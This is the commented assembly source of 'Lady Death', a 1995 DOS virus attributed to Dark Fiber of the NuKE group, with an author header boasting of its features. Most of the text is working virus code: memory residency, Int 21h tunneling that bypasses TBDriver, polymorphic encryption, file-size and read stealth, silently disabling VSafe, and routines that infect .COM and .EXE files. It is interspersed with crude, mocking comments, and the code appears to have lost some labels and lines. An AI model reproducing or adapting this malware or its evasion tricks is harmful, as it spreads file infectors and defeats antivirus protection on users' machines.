Comment ~
AAieeee. I'm sick to death of looking at this code any longer!
I could not test this 100%, coz my machine had an incompatibility i think.
and it only shows up when i infect SOME .exe files. What happens is that
the file is infected properly, its header is updated, so is the memory
requirements, and the stack. Now, it makes no difference if the virus
is in memory or not, but MSDos will load all the file into memory, except
for the last 512bytes or so, so everything gets decrypted, but because
the heap is at the end, its missing, along with some of the code.....
This is through no fault of mine, because the code is sound, so.....
---------------------------------[ MISC. SHIT ]--------------------------------
** (C) 1995 DARK FIBER **
** I told a few people it would be finished by a certain date **
** Well, NuKE are renowned for their shoddy viruses **
** So I wanted to do some extra bug testing **
** Thats my excuse for its late release **
** So I'm hoping to the great binary god its bloody bug free ;) **
** Ugh, Ugh, Ugh, after 4 versions it better bloody well be **
------------------------------[ MISC. SHIT ENDS ]------------------------------
Virus Name : Lady Death (a.k.a the Stainless Steel Armadillo)
Chotto Abunai ne?
(Translation : "Little bit dangerous hmmm?")
Version : 0.1 Delta
Author : Dark Fiber [NuKE]
Origin : Australia
Bonus : Comments and ramblings from the author. Free of charge
Yes, completley useless rants thrown in for good
Type : UMB Resident, Tunneling, Poly, Stealth, .COM .EXE .XTP,
MCB stealth (Yeah! finally got it working! ð:)
Minimum Processor : 80286. Not tested for. Who gives a fuck if some wanky
little XT does down. They will probably think the
long wait means its still trying to load! heheheh ;)
Payload : N.A. Nada, Zip, Zilch,
Retroish thingy stuff : MSAV VSafe
McAfee Scan
ThunderByteAntiVirus (On Tunneling)
ThunderByteClean (TBClean cant clean the infection)
VDS (Well, it avoided its bait files, etc)
(or is that just my stealth? ;)
Anti-Heurstics : TBscan : On .COM files it fools TBScan into thinking
its a .TXT file, so it just "Looks", .EXE
files have no protection due to IP points
directly at the polycode
F-Prot : Uses the standard F-Prot kill technique of a
short jump (PIQ clear).
Shit, just fot 2.19, and the Anti-FP does
not work any more. gotta find some new stuff.
AVP : On 2.2 it finds a EXETSR_Type virus or something.
Poly \ Encryption : Lady Deaths Cosmetic Kit ð;)
Polymorph routines will generate a decryption routine
somewhere in the range of about 30 bytes to 64 bytes,
Will encrypt files with ADD, SUB, XOR, (NOT+NEG rmoved)
Lady Death's cosmetic kit,
Yes, it changes the face of your virus, takes those
unencrypted wrinkles out of your life, Lady Death's
cosmetic kit works wonders on memory resident .COM
and .EXE infectors, making them look more complex
than they really are, we here at [NuKE] will garuntee
that your virus will have that "just encrypted" look
that every young encrypted virus has, or we'll give
you your un-encrypted virus back, free of charge.
The polymorphic routines generate a variable length
decryptor, so the virus must be padded between the
end of the virus and the copy of the original
un-altered header to create a constant length I can
After reading the documentation for TBAV [WTF! READ
documentaion! shya ;)] I liked the part where it tells
of creating a scan string for Malaga or something (one
of the encrypted Jerusalem variants) and about how it
only used two different CondJump opcodes, wich helped
give it away. So after some thinking, I managed to
implement 6 different ones, a step up from the standard
two ;), so thats 12 diff loops (up+down) in total!
The poly is the lamest routine in here, but I was
despairing over the size of her.... so had to be
cheap and cut back somewhere!
I originally had the virus completley polymorphing the
WHOLE file (in chunks), this put a major slowdown,
because, while avoiding memory scanners, it would
decrypt Int21h EVERY SINGLE TIME it was called, now
this is the most overused INT ever, its called more
times than the bloody clock per second, and it also
put an overhead of like 64 bytes of decryption per
chunk, so basically it is not really feasible.
Size : Poly (Max 64) + Virus Size + Padding + Header (018h)
2774 bytes infected
Scan Stuff Finds : Scan 2.x : Nothing.
(Like thats an achievement)
F-Prot 2.19 (/Analyse) : Nothing
F-Prot 2.19 (/Paranoid) : Nothing
TBAV 6.35 : Flags, flags, flags ;(
AVP 2.2 : Suspicious
Compiler : A86 v3.72
People with enough money and no sense who own copies
of TASM or MASM will have to do a re-write, but hey,
thats against the laws of copyright ;).
People with no money and no sense who own pirated
copies of TASM or MASM can just ftp down to there local
site and leech a copy of A86.
People with a lesser version of A86 can just leech a
new version.
People who are using CHASM can just fuck off.
Side Effects : Hmm, well, i used the 6th bit (starting from 0)
to mark an infection, as far as i could tell, its the
only bit that is not used as Novel use the last bit
(7) for some network execution status thingy.
The FCB stealth routine, well, because non extended
FCB's dont include the attrib field, we can't test for
an infection, but how many programs use standard FCB's?
It does not check to see how small a file is before
infecting it, so it will infect files 0 bytes long.
Notes : This virus changes its behaviour on the fly
depending on what program or function is being
run as to what mode it will enter.
Programs such as SCAN\PKZip,ARJ, etc will make
the virus go into FastInfection mode which will infect
any file opened with 3D\6C, while programs like
Scandisk, Chkdsk, or NortonDiskDoctor make the virus
turn all its stealthing modes off, etc, etc.
Minimum memory required by the program is also
adjusted for .EXE files
Mode Changes : * PKZip, PKZipfix, (PKZ*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* Arj, Arjm, Arjsort, (ARJ*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* LHA, LHArc , (LHA*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* RAR (RAR*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* Microsoft Backup (MSB*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* Central Point Backup (CPB*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* Backup (BAC*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- FastInfection on
* Norton Disk Doctor (NDD*)
- StealthFCB+DTA+Stamp off
- StealthRead off
* Chkdsk (CHK*)
- StealthFCB+DTA+Stamp off
- StealthRead off
- Hide our MCB memory
* Scandisk (SCAND*)
- StealthFCB+DTA+Stamp off
- StealthRead off
* Speedisk (SPEE*)
- StealthFCB+DTA+Stamp off
- StealthRead off
* Defrag (DEF*)
- StealthFCB+DTA+Stamp off
- StealthRead off
* Scan (McAfee) (SC*)
- Fast infection on
* Vet Anti-Virus (VET*)
- Fast infection on
* Invercible (IV*)
- Infect files off
* F-Prot (F-*)
- Fast infection on
* AVPro + AVPTsr, etc (AV*)
- Infect files off
* TBav family of programs. (TB*)
- Infect files off
* (Makes a great infection vector) (LI*)
- Fast infection on
* (its what i call (T.*)
- Fast infection on
* Qemm Manifest (MFT*)
- Hide our MCB memory
* SI ?? (SI*)
- Hide our MCB memory
* MI ?? (MI*)
- Hide our MCB memory
* Sysinfo (Nortons) (SYSI*)
- Hide our MCB memory
* Mem (MessyDos) (MEM*)
- Hide our MCB memory
Disclaimer : No bytes or stray bits where killed during the making
of this virus, however an MCB header was damaged when
it failed to get out of the way.
ReVisionary History : 0.1a - Concieved with the froth of my loins and my
2327? bytes of code (-Poly, -Header)
0.1b - Refined the figure of this pale skinned
beauty (Err, um, I optimised some code)
No changes were made to her costume (err No
bug fixes were implemented.)
And made her black leather outfit a bit
shinnier ;) (Um, made the polymorph better)
2358 bytes of code per infection.
0.1c - Gave her a new hairdo (Um, added MCB stealth)
2423 bytes of code per infection.
0.1d - Added tunneling. Fixed the MCB stealth
bug. blah. blah. Some more minor things.
2774 bytes of code per infection.
;-------------------------------[ CODERS READY ]-------------------------------
;-----------------------[ CODERS, START YOUR ASSEMBLER ]-----------------------
;---------------------------------[ ASSEMBLE ]---------------------------------
PolySize equ 64 ;Max Polysize allowed.
PolyAnd equ 2 ;Careful if u change this.
;This will drastically alter the size of the
;poly code generated...., and you would also
;have to alter PolySize.... to compensate.
;Look ma, no hands!
;Well, i'm yet to find an anti-tbscan piece of code
;that i like....
;Kill TBAVs "E" relocatable entry point flag
; db 0b8 ;mov ax,
; pop si ;pop si
; db 0e9 ;Jump over call
; dw 3 ;last opcode of mov cx is our jump
; call $ - 4 ;Call back to POP SI
; sub si,$
;Here we go, on the rollercoaster ride of code.
mov ax,02edfh ;Yooohoooo, Are u in memory?
int 21h
;This routine manages to kill F-Prot, whilst gaining us the IP of our virus.
;The HLT instruction also manages to stop TBClean from cleaning the file!
; hlt ;Halt the proc
; mov bp,sp
; mov si,w[bp-6] ;Get the IP,
; sub si,Kill_F_Prot ;Sub to get the virus offset
;Shit, EMM386, did not like the HLT..... ;(
;Now i gotta find some otherway to kill f-prot, etc.
;This routine stops F-Prot + TBClean from working.
call $+3
inc sp ;This will kill the INT1 tracer
inc sp ;programs, such as TBClean ;)
mov bp,sp ;Why? coz, look, read the bit
mov si,word ptr [bp-2] ;on the tunneling code.
sub si,Kill_F_Prot+3
cmp ax,"Ÿd" ;dŸ, after xchg al,ah
jne GoResident ;Yohoho and a bottle of rum.
jmp WeAreResident
;A word on the memory allocation might be in order.
;First, we check for enuff memory in the UMB for us,
;if there is none or not enough available we will resize our current
;host. Now, when resizing the current host, it SHOULD NOT resize the host
;if its min+max mem allocation in the .EXE header are the same, the reason
;being, um, oops, stupidly, i do resize.... ;( hmm, gotta fix that.
push es ;Dont loose the psp seg
mov di,3 ;offset into MCB
mov ax,05803
mov bx,1 ;Now ReChain, so we know fer
int 21h ;sure they r chained.
mov ax,05801
mov bx,081 ;High mem, best fit, then low
int 21h
mov ah,048
mov bx,virmem ;Enuff for us?
int 021
jnc MemIsOK
mov ax,es ;Nup, so resize the host
dec ax ;Gimme MCB of host seg
mov ds,ax ;Set to data
mov ax,virmem+1 ;+1 for mcb header
mov bx,word ptr [di]
sub bx,ax ;
sub word ptr [di+0f],ax ;fix psp
mov ah,04a ;resize minus enuff mem
int 21h ;for us
mov ah,048
mov bx,virmem ;Now get our memory
int 21h
jc BadMemory ;Still none? then exit
dec ax ;Set to MCB para
mov es,ax
es: mov word ptr [di-2],8 ;Make system data
inc ax
mov es,ax
mov ax,05803 ;Unchain UMBs from memory
xor bx,bx
int 21h
mov ax,05801 ;Reset malloc type to
int 21h ;low mem, first fit.
xor di,di ;set dest offset
mov cx,VirLen ;Copy virus up there
cs: repnz movsb ;SI already = Delta offset
push es
push offset Run_Tunnel
call Tunnel_Int21h ;Tunnel to get Int21he
mov ds,cx ;CX == 0
mov si,cx
mov word ptr [021*4],offset Int21Handler
mov word ptr [021*4+2],cs
pop es
push cs
pop ds
add si,offset OldHostCode1
mov bx,es
add bx,16
lodsw ;Get SS
add ax,bx
mov dx,ax
lodsw ;Get SP
mov bp,ax
lodsw ;Get IP
mov di,ax
lodsw ;Get CS
add ax,bx
mov ss,dx
mov sp,bp
push ax
xor ax,ax
push di
db 0eb ;If exe skip code put back routine
SkipPutBack: db 0
movsw ;DI=IP,=0100h on .COM
push es
pop ds
mov bx,ax
mov cx,ax
cwd ;hey, its the file pointer trick!
mov bp,ax
mov si,ax
mov di,ax
;We have a quit prog check so we can re-set our attributes
pop si
cs: mov byte ptr [StatusBits],0 ;Clear all status bits
call ShowMCB
Jmp $Run_Int21
call Save_Regs
mov bx,8 ;Set MCB to system
jmp BlowDryMCB ;data program
call Save_Regs
xor bx,bx ;Set MCB to free
push cs
pop ax
dec ax
mov es,ax
es: mov word ptr [1],bx ;Set MCB to BX
push cs
pop ds
mov di,8 ;Point to MCB name
mov si,offset buffer+22 ;Copy filename into
mov cx,di ;the MCB name
rep movsb
call Restore_Regs
db "Lady Death : DarkÿFiber [NuKE]"
; called it "Lady Death" coz its one of the best comics ever, and if you
; havn't seen it then you don't know what your missing. ð|)
; Well, its not a patch on Ah My Goddess, but it is good.
;Anti-Int1h tunnel code. Same as what TBAV uses, i just changed the reigsters
cli ;
push si ;This code will kill programs that
push ax ;try and use Int 1 to trace me.
xchg ax,si ;When an Int1 trace is detected it
pop ax ;will skip the virus Int routine and
dec sp ;run the the top Dos Int21h, not the
dec sp ;one we found when WE tunneld through
pop si ;the code. ;), so they get the int21
cmp ax,si ;of the program that last hooked it
pop si ;before the virus did. Why did i
jne $Run_Int21 ;add this? Who knows? delete it if u
;want to.
cmp ax,02edfh
jne AintNoYohoho
mov ax,"Ÿd" ;dŸ after xchg al,ah
push si
push ax
mov si,offset Int_Table ;What functions did we hook?
cs: lodsb
sub al,ah ;Is it the same?
jnz NotInIntTable ;If Not Zero, then its not...
pop ax
cs: jmp word ptr [si] ;Run out procedure
inc si,2
cs: cmp byte ptr [si],0 ;Check for end of table
jne ReadFromTable
pop ax
pop si
cs: Jmp D[Old21h] ;Run OLD dos int21h
cs: call D[Int21h] ;Run TUNNELED dos Int21h
;This procedure will stealth reads opon virus inflicted areas
;When a file is read,
; use its handle to get the SFT,
; check in the SFT for the attribute
; redirect reads from the start and the end of the virus
pop si
push es,di
call HandleToSFT
cs: test byte ptr [StatusBits],00100xb
jne GoodRead
es: test byte ptr [di+4],040 ;Infected file?
je GoodRead
es: cmp word ptr [di+017],0 ;High size >0000
jne GoodRead
es: cmp word ptr [di+015],018 ;Low size =>0018
jb DoStealthRead
pop di,es
jmp $Run_Int21
es: mov ax,word ptr [di+015]
cs: mov word ptr [StackPointer],ax ;Temp
mov ah,03f
cs: mov word ptr [MinMem],dx ;Temp
cs: mov word ptr [MaxMem],ds ;Temp
cs: mov word ptr [StackSeg],cx ;Temp
call $Call_int21 ;read in infected header
call save_regs
;we now have infected portions in the buffer.
;now we read in our clean header
push es
pop ds
;Fix the file size
call AddSize
call SubPointer
push cs
pop ds
call $Call_Int21
es: pop word ptr [di+017] ;Reset the pointer
es: pop word ptr [di+015]
call SubSize
mov cx,word ptr [StackPointer]
les di,word ptr [MinMem]
mov si,dx
add si,cx
add di,cx
neg cx
add cx,018 ;CX = how much of the buffer
;MAX we can move
cmp cx,word ptr [StackSeg]
jb MoveGoodCode ;Dont move more code in than
;the amount that was asked for
mov cx,word ptr [StackSeg]
rep movsb
call restore_regs
pop di,es
retf 2
; Some notes about the tunneling routine.
; The tunneling routine is designed to tunnel right up to the DOS
; Kernal, unlike some other tunnelers, it does not stop when it
; encounters the
; CALL xxxx
; CS: JMP D[xxxx]
; Dos POINTER to the kernal. Its also able to find the kernal whether DOS
; is loaded LOW or HIGH, with EMM386 etc, etc, blah, QEMM, etc, blah, nuff!
; It also stops other programs from turning off the TRACE bit in the FLAGS
; register by detecting a POPF and OR'ing the flag bit to on.
; Some programs like TBDriver dont tolerate Int1 tracers, but i've added
; code that detected TBDriver, and bypasses it.
; The reason why TBdriver can detect Int1 tracers, is because TBDriver
; takes a word out of memory just below the stack pointer, now, if no
; Int1 tracer has been used, then the word is correct, but if Int1 is running
; then the word is overwritten in memory by the IP, CODE, FLAG of the opcode
; that was single stepped.
; Shit, just tried Nemesis, and it dissabled the tracer, ;(, and considering
; that I just spent the last 9 hours draining (exploring melbournes underground
; drain + tunnel system) I cant really be fucked at even trying to get around
; this.
call save_regs
push cs
pop ds
mov ax,03521 ;Save Int21h
int 21h
mov word ptr [Int21h+2],es
mov word ptr [Int21h],bx
mov word ptr [Old21h+2],es
mov word ptr [Old21h],bx
mov al,01 ;Save Int 0h
int 21h
mov word ptr [Int24h+2],es
mov word ptr [Int24h],bx
mov ah,025 ;Set tunneler Int
mov dx,offset int_1Handler
int 21h
pushf ;Flags for IRET
pop ax
or ah,01 ;Turn trace on
push ax
;To find the kernal, trace a function thats internal to dos so
;that its pretty much garunteed not to be hooked by any other
;program in memory.
mov ax,03306 ;Real Dos Version
call d[Int21h] ;kills BX, DX
;Invokes tunnler
lds dx,word ptr [Int24h]
mov ax,02501 ;Restore Int 1
int 21h
call restore_regs
ret ;Return
call save_regs ;Save regs
lds si,word ptr [bp+22] ;Get CS:IP
lodsb ;Get byte
xor bx,bx ;clear seg overides
cmp al,026 ;ES:
jne NoES
mov bl,1
cmp al,02e ;CS:
jne NoCS
mov bl,2
cmp al,036 ;SS:
jne NoSS
mov bl,3
cmp al,03e ;DS:
jne NoDS
mov bl,4
or bx,bx
je MakeDS ;if seg overide
lodsb ;get next opcode
or bl,bl
jne IsOurCode ;If no seg overides
mov bl,4 ;assume DS
;Left over from some testing ð:)
cmp al,09d ;POPF
jne IsIRET
or word ptr [bp+26],0100 ;keep trace mode on
jmp RunNextOpCode
cmp al,0cf ;IRET
jne IsFARJump
and word ptr [bp+26],0feff ;turn trace off
jmp RunNextOpCode
cmp al,0ea ;JUMP xxxx:yyyy
jne IsJDouble
cs: mov word ptr [Int21h],ax ;Save far jump
cs: mov word ptr [Int21h+2],ax ;Save far jump
jmp RunNextOpCode
cmp al,0ff ;JMP D[xxxx]
jne TBKiller
cmp byte ptr [si],01e ;type 1
je ItIsJDouble
cmp byte ptr [si],02e ;type 2
jne TBKiller
cmp bl,1
jne ItsNotES ;If ES
mov ax,word ptr [bp+2] ;get ES segment
cmp bl,2
jne ItsNotCS ;If CS
mov ax,ds ;get CS segment
cmp bl,3
jne ItsNotSS ;If SS
mov ax,ss ;Get SS segment
cmp bl,4
jne RunSeg ;If DS
mov ax,word ptr [bp] ;Get DS segment
mov ds,ax
mov si,ax
jmp FARJumpData
cmp al,0fa ;CLI
jne RunNextOpCode
cmp ax,0fc9c ;Is it TBDriver?
jne RunNextOpCode
cmp ax,05053 ;TBDriver?
jne RunNextOpCode
sub si,10
mov word ptr [bp+22],si ;Skip TBDriver code ;)
inc si ;Run the Far Jump
jmp FARJumpData
call restore_regs ;Restore
iret ;Run opcode
es: sub word ptr [di+011],VirLenX ;Sub Virus Size
es: sbb word ptr [di+015],0 ;With borrow
es: add word ptr [di+011],VirLenX ;Add virus size
es: adc word ptr [Di+015],0 ;With carry
cs: pop word ptr [SubPointerReturn] ;Save POP
mov cx,018 ;Header size
mov ax,word ptr [di+011] ;Set the pointer to
sub ax,cx
xchg word ptr [di+015],ax ;FileEnd - Buffer
push ax
mov ax,word ptr [di+013] ;Flick N Toggle
sbb ax,0
xchg word ptr [di+017],ax ;Wibble N Wobble
push ax
mov ah,03f
mov dx,offset Buffer2 ;Set to read
db 0eb,0 ;Clear PIQ
db 068 ;PUSH
dw ?
ret ;return
;We disinfect an OPEN file, with BX = Filehandle, and SI on the stack
;We dont need to save the date and time because who ever is writting
;to the host initiated the write, so we dont need to mask that.
pop si
call DisinfectFile1
jmp $Run_Int21
call save_regs
call HandleToSFT
push es
pop ds
mov al,byte ptr [di+4]
test al,040 ;Is it infected
jne RunDisinfect
call restore_regs ;Nyup, lets bugger off.
push es ;Shit, it is,
pop ds ;Okey, lets go to work
xor al,040 ;Clear infection marker
cs: mov byte ptr [OldAttrib],al ;N save it
mov byte ptr [di+2],2 ;Set to read and write
call AddSize ;Fix size
call SubPointer ;Move pointer to header
mov byte ptr [di+4],ch ;clear all attribs
push cs
pop ds
call $Call_Int21 ;read in clean header
es: mov word ptr [di+015],0 ;Reset the pointer to
es: mov word ptr [di+017],0 ;0000:0000
mov ah,040 ;Disinfect the file
call $Call_Int21 ;Now write clean header
mov al,byte ptr [OldAttrib]
push es
pop ds
mov byte ptr [di+4],al ;Reset attributes
pop word ptr [di+017] ;Restore the pointer
pop word ptr [di+015] ;Restore the pointer
call SubSize ;Remove virus size
call restore_regs ;Lets getoutta here
ret ;Return
db "Stainless Steel Armadillo"
; Good manga by Ryukihei published by Associated Press.
;This procedure stealths our virus marker
;If the attribute is requested to be changed, we check for an infection
; and if so, change the attribute, masking our marker.
;If its ask for, we just siphon off the virus marker.
;The reason that we open the file and change the attribs that way is
;because DOS ignores the top bits when you try to set them to on. so
;we gotta do it the long way.
pop si
cs: test byte ptr [StatusBits],0001xb ;We not stealthing
jne NoStealthAttrib ;markers?
cmp al,0
jne SetAttributes ;Read?
call $Call_Int21
and cl,0bf ;If read, mask marker
retf 2
Call $Call_Int21
retf 2
mov ax,04300
push cx
call $Call_Int21 ;Gimme attribs
xchg cx,ax
pop cx
mov ax,04301 ;Set to write
jc NoStealthAttrib
test al,040 ;We infected?
je NoStealthAttrib ;Nope,
pushf ;Yep,
call $Call_Int21 ;Write it
call Save_Regs ;Save regs
mov ax,03d02
call $Call_Int21 ;Open file
xchg bx,ax
call HandleToSFT
or cl,040
es: mov byte ptr [di+4],cl ;Set attributes
mov ah,03e ;Close file
int 021
call Restore_Regs
retf 2 ;Return with our flags
;Stealth the size of infected files in Find First\Next
pop si
call $Call_Int21 ;Run function
call save_regs
or al,al ;Did it work?
jnz NoStealthDir2
mov ah,02f ;Yep, so gimme DTA
call $Call_Int21
es: cmp byte ptr [bx],0ff ;Test for extended FCB
jne NoStealthDir2
lea cx,[bx+7+01d] ;24 : 1a cx = size
add bx,7+0c ;13 : 15 bx = attrib
jmp StealthDir
;Here we use Government Coverup techniques to hide the size of the virus
;during DTA functions, similar to the techniques used by Microsoft to
;try and sell windows 95 to us.
pop si
call $Call_Int21 ;run function
call save_regs
jc NoStealthDir2
mov ah,02f
call $Call_Int21 ;gimme DTA
lea cx,[bx+01A] ;cx = size
add bx,015 ;bx = attrib
cs: test byte ptr [StatusBits],01xb ;Test for stealth size off
jne NoStealthDir2 ;Its on, so no stealth size
push es
pop ds
test byte ptr [bx],040 ;Test for high bit on
je NoStealthDir2 ;No, dont stealth date
and byte ptr [bx],0BF ;Strip the bits
xchg bx,cx
sub word ptr [bx],VirLenX ;To leave a bare program naked
sbb word ptr [bx+2],0 ;in a hostile enviroment.
call restore_regs
retf 2
;What? no i dont publish Ranma 1/2 lemon fan fiction in rec.arts.anime.stories
;And, no, I dont do Ah My Goddess lemon fan fic either!
;But I never said I didnt write any ;) hehehehehahhahhaa...... er, okey then.
;Checks and modifys the bit on extended opens
;This is to help us to stealth the file on future reads.
pop si
;We don't need to check for files that will be created or reset,
;only opened
test dl,00010010xb
jne StandardOpen
;Set some bits to on, to help us during the future stealth process.
;Turn share to deny none on
;Turn read\write mode on
and bx,1011111110001010xb
or bx,0000000000000010xb
cs: test byte ptr [StatusBits],010000xb
je StandardOpen
push dx
mov dx,si
call TryInfection
pop dx
jmp StandardOpen
;Standard Open infection
pop si
cs: test byte ptr [StatusBits],010000xb
je StandardOpen
call TryInfection
call $Call_Int21
call SetupStealth
retf 2
;Call with handle in AX
Jc Ret
call save_regs
xchg bx,ax
call HandleToSFT
push es
pop ds
test byte ptr [di+4],040 ;test 4 infection
je NoSetStealth
call SubSize ;if yep, sub virus size
call restore_regs
pop si
cs: mov byte ptr [StatusBits],0
call CheckFileName
;This enables me to set the bits for the virus mode operation before
;we do anything drastic.
cs: test byte ptr [StatusBits],00010xb ;MCB Memory Stealth?
je $+5
call HideMCB
cmp al,0 ;Check for debugger or other
jne StealthDebuggerEXEC ;If so, stealth it
cs: test byte ptr [StatusBits],01000xb
jne $+5 ;Check for infect files off
;Yes, so don't infect
call TryInfection
jmp $Run_Int21
;Ooops, apologies to everyone with a domain. Looks like I got
;you all banned from #japan again.
; df> priss: sumimasen, atama shigoto onegaishimasu
; priss> df: it would be my pleasure.
; eheheheh ;) she is one weird chick! all i did was ask her for the time.....
;Ick, Disinfect the slimey sheep fucker offov the host.
;Dang debuggers!
call Save_regs
mov ax,03d00 ;Read
Call $Call_Int21 ;Will, set it up for
jc CantDisinfect
Call SetupStealth
xchg bx,ax
Call VSafe_Toggle ;Toggle after opening
Call GetInt24h
mov ax,05700
int 21h
push cx,dx ;Save Date+Time
call DisinfectFile1
pop dx,cx ;Restore Date+Time
mov ax,05701
int 21h
mov ah,03e ;Close
int 21h
call VSafe_Toggle
call SetInt24h
call Restore_Regs
Jmp $Run_Int21
;This is the straightforward infection routine.
;DS:DX = filename
call save_regs
in al,021
or al,02 ;Rip me the ints, n mask keyb.
out 021,al ;so it can't be "break"ed.
cs: mov word ptr [Filename+0],dx
cs: mov word ptr [Filename+2],ds
call Vsafe_Toggle
call GetInt24h
mov si,dx
cmp al,"."
je CheckExtension
or al,al
jnz GetByteName
jmp Bad_File1
or ax,0A0A0h
cmp ax,"XE" + 0A0A0h ;Gimme EXEs
je FixAttribs
cmp ax,"OC" + 0A0A0h ;Gimme COMs
je FixAttribs
cmp ax,"TX" + 0A0A0h ;Gimme XTPs
je FixAttribs
jmp Bad_File1
mov ax,03d00
call $Call_Int21 ;Open the sucker up
jnc Check4Infection
Jmp Bad_File1
xchg bx,ax
call HandleToSFT
push es
pop ds
mov byte ptr [di+2],02 ;Set to Read + Write
mov al,byte ptr [di+4] ;Get attribute
test al,040
je RunInfection
jmp Close_File1
mov byte ptr [di+4],0 ;clear attributes
push cs,cs
pop ds,es
or al,040 ;Mask infection
mov byte ptr [OldAttrib],al ;Store it for later
mov ax,05700
int 21h
mov word ptr [FileStamp],cx ;Date + Time save
mov word ptr [FileStamp+2],dx
mov ah,03fh ;Read in the header
mov cx,018h
mov dx,offset Buffer
call $Call_Int21
mov si,dx
mov di,offset Buffer2
rep movsb
mov si,offset Buffer2+0Eh ;Save needed information
mov di,offset OldHostCode1
movsw ;SS
movsw ;SP
lodsw ;CRC
movsw ;IP
movsw ;CS
mov cl,3 ;Set for .EXE infection
mov si,dx
add dx,offset "ZM"-Buffer ;Dangme with the anti tbflag
cmp word ptr [si],dx ;code! Why do i need it
je DontFixCOMHeader ;when were encrypted? hehehe
;Oh, i remeber ;) stupd "#"
mov di,offset HostSS
mov word ptr [di + Buffer-HostSS], 0a0d
mov word ptr [di + Buffer-HostSS+2], 0e920
mov ax,0fff0
xchg cx,ax
mov ax,0fffe
mov ax,0100
xchg cx,ax
;CL = 0 from the XCHG 0100 ;Set for .COM infection
mov byte ptr [SkipPutBack],cl
mov ax,04202 ;Pointer to the end
xor cx,cx
int 021
cmp dx,8 ;Too big for our .exe file
jb HighSizeOK
jmp Close_File1
cmp byte ptr [Buffer],0d
je AintNoEXE
push ax
and ax,0f ;Gimme lowbits fer me offset
mov word ptr [InstPointer],ax
pop ax
push ax, dx
mov cx,512
div cx
or dx,dx
je $+2
inc ax
cmp [(ExeSizeMOD512)+2],ax
je GoodEXEHeader1
pop dx, ax
jmp Close_File1
cmp [(ExeSizeMOD512)+0],dx
jne BadEXEHeader
add word ptr [(EXESizeMod512)+2],(VirLenX/512)
add word ptr [(EXESizeMod512)+0],VirLenX-(VirLenX/512*512)
pop dx, ax
mov cx,4
shr dx,1 ;Roundhouse kick to the
rcr ax,1 ;segment descriptor
loop $-4
sub ax,word ptr [HeaderParagraphs]
mov word ptr [CodeSegment],ax
add ax,VirMem/2 ;fix the Stack Segments
mov word ptr [StackSeg],ax
mov word ptr [StackPointer],512 ;Enuff space.
add word ptr [MinMem],VirMem/2 ;Gimme more memory!
jnc DontFixMemory
sub word ptr [MinMem],Virmem/2
mov ax,word ptr [InstPointer] ;Restore Delta ofsset
inc cx ;set cx=1 for DS!=CS
jmp WriteMe
sub ax,06
mov word ptr [Buffer+4],ax
add ax,0106
;cx should be 0 already
push bx ;Save handle
;AX is our infection IP
mov bx,VirLen + 030
mov si,offset Virus_Start
mov di,offset PolyBuffer
call MightyMorphinFacialCode ;Poly the virus
sub cx,030
pop bx ;Restore handle
mov ah,040 ;Save me code in the fridge
Call $Call_Int21 ;for later.
;CX = Virus code written to host, now we must sub it from
; the fixed size to get how much padding we must do.
mov cx,VirLenX - Buflen
sub cx,ax
add dx,di ;AL into the poly buffer.
mov ah,040
call $Call_Int21
mov ah,040 ;Save me a stubby
mov cx,BufLen
mov dx,offset Buffer2
Call $Call_Int21
mov ax,04200 ;Pointa to start
xor cx,cx
int 021
mov ah,040 ;Save the stub
mov cl,018
mov dx,offset buffer
;We shouldnt need this next bit coz we dont modify anything in the .com
;block save the first 3 bytes...... but we got a damnable error somewhere!
;.Com files <18h will be killed..... duh! shoulda seen that comming.
mov si,dx
cmp byte ptr [si],0d
jne $+4
mov cl,6
call $Call_Int21
mov ax,05701 ;Save me time and date o
mov cx,word ptr [FileStamp] ;creation
mov dx,word ptr [FileStamp+2]
int 21h
call HandleToSFT
mov al,byte ptr [OldAttrib]
es: mov byte ptr [di+4],al
mov ah,03e ;Close me
int 21h
call SetInt24h ;Gimme i21h back
call Vsafe_Toggle ;Reset VSAFE
in al,021
and al,0fd ;Okey, givem back the keyboard
out 021,al
call restore_regs ;Gimme regs back too
ret ;Ret me.
push ax,bx
mov ax,01220h
int 02Fh
xor bx,bx
es: mov bl,byte ptr [di]
mov ax,01216h
int 02Fh
pop bx,ax
;This routine will save all the registers
push es
push ds
mov bp,sp
jmp word ptr [bp+20]
;This routine will restore all the registers from a Save_Regs
pop bx
mov bp,sp
mov word ptr [bp+20],bx
pop ds
pop es
;This routine TOGGLES all of VSAFE's modes to off, then next time its called
;it will turn them all back on, without alerting the user to its absence in
;memory, or causing alarms, much better than 0FA01h
;This is a flip-flop function, first time it is called it will be disabled,
;the second time its called it will be re-enabled, and so on.
call save_regs
mov ax,0fa02h
db 0b3h ;mov bl,##
VSafe_Bits: db 0
mov dx,"EY" - 0fa02 ;Eli Yuval?
add dx,ax
int 13h
jc NoVsafe
cs: mov byte ptr [VSafe_Bits], dl
call restore_regs
push ax
push ds
xor ax,ax
mov ds,ax
mov ax,offset Int24Handler
xchg ax,word ptr [024h*4]
cs: mov word ptr [Int24h],ax
mov ax,cs
xchg ax,word ptr [024h*4+2]
cs: mov word ptr [Int24h+2],ax
pop ds
pop ax
push ax
push ds
xor ax,ax
mov ds,ax
cs: mov ax,word ptr [Int24h]
xchg ax,word ptr [024h*4]
cs: mov ax,word ptr [Int24h+2]
xchg ax,word ptr [024h*4+2]
pop ds
pop ax
mov al,3
;No, I'm not japanese, I just happen to love anime+manga
;Wanted: Bottled Ecchi hahhaha
;Free Plug [DiskMagazineGenerator v1.04] a wicked piece of coding from me ;)
;ds:dx = filename
call save_regs
push cs
pop es
mov si,dx
mov di,offset buffer2
lodsb ;Get me byte
cmp al,060
jb $+8
cmp al,07f
ja $+4
and al,0df ;Squeeze me byte
es: mov byte ptr [di+22],al ;save for mcb stealth!
stosb ;Save me byte
cmp al,"\" ;Covers the directory
je ResetBufferOffset
cmp al,":" ;Covers the drive
je ResetBufferOffset
or al,al
jne GetChar
mov cx,7 ;clear it out
repnz stosb
push cs
pop ds
mov si,offset ModeChangeFiles
xor cx,cx
add si,cx
mov di,offset buffer2
xor cx,cx
mov cl,al
shr al,3
and cl,0111xb
jcxz NoMoreNames
repe cmpsb
jne CheckName
mov byte ptr [StatusBits],al
call restore_regs
